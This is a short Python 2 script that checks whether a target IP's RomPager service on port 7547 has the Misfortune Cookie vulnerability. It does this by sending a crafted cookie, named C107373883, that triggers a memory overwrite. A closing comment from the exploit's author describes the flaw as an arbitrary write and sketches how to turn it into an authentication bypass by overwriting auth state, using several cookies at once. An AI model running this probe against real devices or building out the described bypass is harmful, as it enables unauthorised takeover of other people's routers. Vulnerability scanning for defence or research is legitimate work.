#!/usr/bin/python2
# coding: utf-8
# misfortune cookie probe
# ~ skyhighatrist
import requests
import sys

def check(ip):
    print "{+} Probing %s for the Misfortune Cookie Vuln..." %(ip)
    url = "http://%s:7547/lol" %(ip) # /lol will never exist so it makes a good canary
    cookies = {'C107373883': '/rummery'} # Rum Research Institute says hi! Read exploit developer notes comment at end...
    try:
        r = requests.get(url=url, cookies=cookies)
    except Exception:
        sys.exit("{!} failed to send request")
    if "rummery" in r.content:
        print "{$$} %s is vulnerable to misfortune cookie!" %(ip)
    else:
        print "{-} Not vulnerable, probably"

def main(args):
    print "Misfortune Cookie Checker"
    if len(args) != 2:
        sys.exit("use: %s <target ip>" %(args[0]))
    check(ip=args[1])

if __name__ == "__main__":
    main(args=sys.argv)
"""
exploit developer notes:
So, basically. In the cookie... 
C107373883 is an offset to the value where the 
GET requests variable is being held inside the 
rompagers internal struct that holds state information,
like the current request shit, if you have auth, etc.
the value of the cookie is what it gets overwritten with.
This is basically an arbritrary write-whateverthefuck-where.
So, to write a full auth bypass exploit if you figure out 
how it handles auth, and overwrite those bits with values
that tell it you are authenticated, it will let you right
the fuck in.
Oh, also, you can have multiple cookies for overwriting multiple
things ;)
"""